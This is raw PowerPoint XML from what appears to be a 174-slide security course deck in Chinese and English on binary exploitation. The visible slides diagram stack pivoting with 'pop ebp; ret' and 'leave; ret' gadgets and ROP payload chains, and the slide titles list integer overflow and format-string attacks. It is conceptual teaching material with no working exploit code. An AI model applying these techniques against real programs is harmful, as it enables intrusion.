          <a:ln w="19050" cap="flat" cmpd="sng">
            <a:solidFill>
              <a:schemeClr val="dk2"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:round/>
            <a:headEnd type="none" w="med" len="med"/>
            <a:tailEnd type="triangle" w="med" len="med"/>
          </a:ln>
        </p:spPr>
      </p:cxnSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1868" name="Shape 1868"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="939500" y="3200736"/>
            <a:ext cx="20952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600" b="1" kern="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="666666"/>
                </a:highlight>
                <a:latin typeface="Consolas"/>
                <a:ea typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
                <a:sym typeface="Consolas"/>
              </a:rPr>
              <a:t>mov   esp, ebp</a:t>
            </a:r>
            <a:endParaRPr sz="1600" b="1" kern="0">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
              <a:highlight>
                <a:srgbClr val="666666"/>
              </a:highlight>
              <a:latin typeface="Consolas"/>
              <a:ea typeface="Consolas"/>
              <a:cs typeface="Consolas"/>
              <a:sym typeface="Consolas"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr defTabSz="1219170">
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1600" kern="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:ea typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
                <a:sym typeface="Consolas"/>
              </a:rPr>
              <a:t>pop   ebp</a:t>
            </a:r>
            <a:endParaRPr sz="1600" kern="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Consolas"/>
              <a:ea typeface="Consolas"/>
              <a:cs typeface="Consolas"/>
              <a:sym typeface="Consolas"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1869" name="Shape 1869"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3393800" y="3265536"/>
            <a:ext cx="3000400" cy="4096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leave ; ret ;</a:t>
            </a:r>
            <a:endParaRPr sz="1867" kern="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1870" name="Shape 1870"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8164633" y="3088536"/>
            <a:ext cx="2095200" cy="763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leave ret</a:t>
            </a:r>
            <a:endParaRPr sz="1867" kern="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="1871" name="Shape 1871"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="1862" idx="0"/>
            <a:endCxn id="1869" idx="2"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="10800000">
            <a:off x="4893967" y="3675267"/>
            <a:ext cx="400" cy="1076400"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="19050" cap="flat" cmpd="sng">
            <a:solidFill>
              <a:schemeClr val="dk2"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:round/>
            <a:headEnd type="none" w="med" len="med"/>
            <a:tailEnd type="triangle" w="med" len="med"/>
          </a:ln>
        </p:spPr>
      </p:cxnSp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="1872" name="Shape 1872"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="1870" idx="1"/>
            <a:endCxn id="1869" idx="3"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="10800000">
            <a:off x="6394233" y="3470336"/>
            <a:ext cx="1770400" cy="0"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="19050" cap="flat" cmpd="sng">
            <a:solidFill>
              <a:schemeClr val="dk2"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:round/>
            <a:headEnd type="none" w="med" len="med"/>
            <a:tailEnd type="triangle" w="med" len="med"/>
          </a:ln>
        </p:spPr>
      </p:cxnSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1873" name="Shape 1873"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3200433" y="3318336"/>
            <a:ext cx="124400" cy="2904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74" name="Shape 1874"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8164633" y="3820100"/>
            <a:ext cx="2095200" cy="763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new stack addr</a:t>
            </a:r>
            <a:endParaRPr sz="1867" kern="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1875" name="Shape 1875"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5110967" y="3942033"/>
            <a:ext cx="3000400" cy="5392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ebp = new stack addr</a:t>
            </a:r>
            <a:endParaRPr sz="1867" kern="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Consolas"/>
              <a:ea typeface="Consolas"/>
              <a:cs typeface="Consolas"/>
              <a:sym typeface="Consolas"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="1876" name="Shape 1876"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="1869" idx="0"/>
            <a:endCxn id="1877" idx="2"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="10800000" flipH="1">
            <a:off x="4894000" y="2316736"/>
            <a:ext cx="400" cy="948800"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="19050" cap="flat" cmpd="sng">
            <a:solidFill>
              <a:schemeClr val="dk2"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:round/>
            <a:headEnd type="none" w="med" len="med"/>
            <a:tailEnd type="triangle" w="med" len="med"/>
          </a:ln>
        </p:spPr>
      </p:cxnSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1878" name="Shape 1878"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8164633" y="2488733"/>
            <a:ext cx="2095200" cy="2904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new ebp value</a:t>
            </a:r>
            <a:endParaRPr sz="1867" kern="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1877" name="Shape 1877"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3394167" y="1777533"/>
            <a:ext cx="3000400" cy="539200"/>
          </a:xfrm>
          <a:prstGeom prst="rect">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 sz="1867" kern="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:ea typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
                <a:sym typeface="Consolas"/>
              </a:rPr>
              <a:t>ROP payload 2</a:t>
            </a:r>
            <a:endParaRPr sz="1867" kern="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1879" name="Shape 1879"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8164633" y="1907933"/>
            <a:ext cx="2095200" cy="290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a:t>
            </a:r>
            <a:endParaRPr sz="1867" kern="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1880" name="Shape 1880"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7556000" y="1665333"/>
            <a:ext cx="539200" cy="763600"/>
          </a:xfrm>
          <a:prstGeom prst="lef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1881" name="Shape 1881"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="1880" idx="1"/>
            <a:endCxn id="1877" idx="3"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="10800000">
            <a:off x="6394400" y="2047133"/>
            <a:ext cx="1161600" cy="0"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="19050" cap="flat" cmpd="sng">
            <a:solidFill>
              <a:schemeClr val="dk2"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:round/>
            <a:headEnd type="none" w="med" len="med"/>
            <a:tailEnd type="triangle" w="med" len="med"/>
          </a:ln>
        </p:spPr>
      </p:cxnSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1882" name="Shape 1882"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8164700" y="2198333"/>
            <a:ext cx="2095200" cy="290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gadget 1</a:t>
            </a:r>
            <a:endParaRPr sz="1867" kern="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1883" name="Shape 1883"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8164633" y="1632451"/>
            <a:ext cx="2095200" cy="290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gadget N</a:t>
            </a:r>
            <a:endParaRPr sz="1867" kern="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1884" name="Shape 1884"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="10756800" y="2164725"/>
            <a:ext cx="848800" cy="9988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Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>new stack addr</a:t>
            </a:r>
            <a:endParaRPr sz="1867" kern="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="1885" name="Shape 1885"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="10800000">
            <a:off x="10259833" y="2777525"/>
            <a:ext cx="425600" cy="0"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="19050" cap="flat" cmpd="sng">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:round/>
            <a:headEnd type="none" w="med" len="med"/>
            <a:tailEnd type="triangle" w="med" len="med"/>
          </a:ln>
        </p:spPr>
      </p:cxnSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1886" name="Shape 1886"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5147067" y="2753964"/>
            <a:ext cx="3000400" cy="5392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b="1" kern="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:ea typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
                <a:sym typeface="Consolas"/>
              </a:rPr>
              <a:t>esp = new stack addr</a:t>
            </a:r>
            <a:endParaRPr sz="1867" b="1" kern="0">
              <a:solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill>
              <a:latin typeface="Consolas"/>
              <a:ea typeface="Consolas"/>
              <a:cs typeface="Consolas"/>
              <a:sym typeface="Consolas"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="31" name="矩形 30">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F894ACEE-A531-4FE3-8ECE-939B3C739021}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="10886"/>
            <a:ext cx="5638800" cy="400110"/>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返回导向编程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其它</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>ROP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>技巧</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1_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12372</TotalTime>
  <Words>14596</Words>
  <Application>Microsoft Office PowerPoint</Application>
  <PresentationFormat>宽屏</PresentationFormat>
  <Paragraphs>2431</Paragraphs>
  <Slides>174</Slides>
  <Notes>113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174</vt:i4>
      </vt:variant>
    </vt:vector>
  </HeadingPairs>
  <TitlesOfParts>
    <vt:vector size="188" baseType="lpstr">
      <vt:lpstr>-apple-system</vt:lpstr>
      <vt:lpstr>等线</vt:lpstr>
      <vt:lpstr>华文隶书</vt:lpstr>
      <vt:lpstr>隶书</vt:lpstr>
      <vt:lpstr>微软雅黑</vt:lpstr>
      <vt:lpstr>微软雅黑 Light</vt:lpstr>
      <vt:lpstr>Algerian</vt:lpstr>
      <vt:lpstr>Arial</vt:lpstr>
      <vt:lpstr>Arial Black</vt:lpstr>
      <vt:lpstr>Calibri</vt:lpstr>
      <vt:lpstr>Consolas</vt:lpstr>
      <vt:lpstr>Noto Sans</vt:lpstr>
      <vt:lpstr>Verdana</vt:lpstr>
      <vt:lpstr>1_Simple Light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动态链接相关结构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ROP连续调用多个libc函数</vt:lpstr>
      <vt:lpstr>PowerPoint 演示文稿</vt:lpstr>
      <vt:lpstr>栈迁移</vt:lpstr>
      <vt:lpstr>PowerPoint 演示文稿</vt:lpstr>
      <vt:lpstr>栈迁移</vt:lpstr>
      <vt:lpstr>栈迁移</vt:lpstr>
      <vt:lpstr>栈迁移: "pop ebp ret" + "leave ret"</vt:lpstr>
      <vt:lpstr>栈迁移: "pop ebp ret" + "leave ret"</vt:lpstr>
      <vt:lpstr>栈迁移: "pop ebp ret" + "leave ret"</vt:lpstr>
      <vt:lpstr>栈迁移: "pop ebp ret" + "leave ret"</vt:lpstr>
      <vt:lpstr>栈迁移: "pop ebp ret" + "leave ret"</vt:lpstr>
      <vt:lpstr>x64 ROP</vt:lpstr>
      <vt:lpstr>__libc_csu_init Gadgets for x64</vt:lpstr>
      <vt:lpstr>PowerPoint 演示文稿</vt:lpstr>
      <vt:lpstr>Integer Overflow</vt:lpstr>
      <vt:lpstr>Integer Overflow in Linux kernel</vt:lpstr>
      <vt:lpstr>Integer Overflow Quiz</vt:lpstr>
      <vt:lpstr>Format String</vt:lpstr>
      <vt:lpstr>Format String Vuln Discovered(year2000)</vt:lpstr>
      <vt:lpstr>Format String related Functions</vt:lpstr>
      <vt:lpstr>Format String syntax</vt:lpstr>
      <vt:lpstr>Format String Example</vt:lpstr>
      <vt:lpstr>Format String Example</vt:lpstr>
      <vt:lpstr>Format String Example</vt:lpstr>
      <vt:lpstr>Format String Example</vt:lpstr>
      <vt:lpstr>Format String Code Exec</vt:lpstr>
      <vt:lpstr>Format String Usage</vt:lpstr>
      <vt:lpstr>Format String Strategy</vt:lpstr>
      <vt:lpstr>Format String tricks and gotchas</vt:lpstr>
      <vt:lpstr>Format String tricks and gotchas</vt:lpstr>
      <vt:lpstr>Format String Challenge</vt:lpstr>
      <vt:lpstr>Format String Tools and Ref</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IZAYOI</dc:creator>
  <cp:lastModifiedBy>ruizhi zhao</cp:lastModifiedBy>
  <cp:revision>349</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2020-05-03T14:32:49Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2024-03-25T07:25:44Z</dcterms:modified>
</cp:coreProperties>
</file>